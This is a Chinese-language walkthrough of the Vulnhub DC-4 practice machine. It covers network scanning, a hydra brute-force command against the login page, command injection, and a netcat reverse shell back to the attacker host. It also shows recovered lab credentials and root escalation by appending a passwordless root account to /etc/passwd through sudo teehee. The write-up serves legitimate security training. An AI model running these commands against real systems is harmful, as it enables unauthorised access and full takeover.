Vulnhub靶机DC系列-DC-4

Vulnhub靶机DC系列-DC-4

靶场名称：DC-4
下载地址：

DC-4.zip (Size: 617 MB)
Download: http://www.five86.com/downloads/DC-4.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-4.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-4.zip.torrent   (
Magnet) 

VMware->文件->打开->选中 .ova 文件，导入，会提示导入失败，点重试就完事了(双击.ova好像就直接导入了-_-)

打开DC靶机（网络适配器看一下是不是NAT模式，不然扫不出来）

kali攻击机网段:192.168.210.0/24
nmap 扫一下DC-4靶机的网段

namp -sn x.x.x.x/x

DC-4靶机：192.168.210.143
kali攻击机网段:192.168.210.137

nmap 192.168.210.143 -sV

可以看到开放端口80、22和操作系统
访问页面，就一个登录页面
dirb扫一下目录,没啥有用信息，万能密码试过了无效，也没有注入点

使用hydra尝试爆破。
hydra使用说明参考：
https://blog.csdn.net/qq_40657585/article/details/84557478
https://zhuanlan.zhihu.com/p/397779150

hydra -l admin -P /usr/share/wordlists/metasploit/password.lst -s 80 192.168.210.143 http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" -f

太慢了·····
换bp,换字典试试

运气不错

• admin
• happy
  进去看看，3条命令，抓包看看有没有命令执行
  
  好像可以
  
  看下权限开始提权
  进行反弹shell,攻击机监听9999端口
• 靶机执行 nc -e /bin/sh 192.168.3.20 9999
• nc -lvvp 9999
  
  shell是无回响，python变成交互

python -c "import pty;pty.spawn('/bin/bash')"

看内核uname -a
为啥双写。。。但是不影响命令

3个用户

jim下有个类似字典文件，copy出来从22端口爆破他

• jim
• jibril04

切换到jim用户

su jim

jim 用户下/var/mail目录下有封给jim的邮件
老板让他把密码给jim

• charles
• ^xHhA&hvim0y

切换到charles用户

查看可以使用的root权限命令
使用teehee命令添加一个root权限的账号

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

su admin 即为root权限，密码为空

提权成功

靶机结束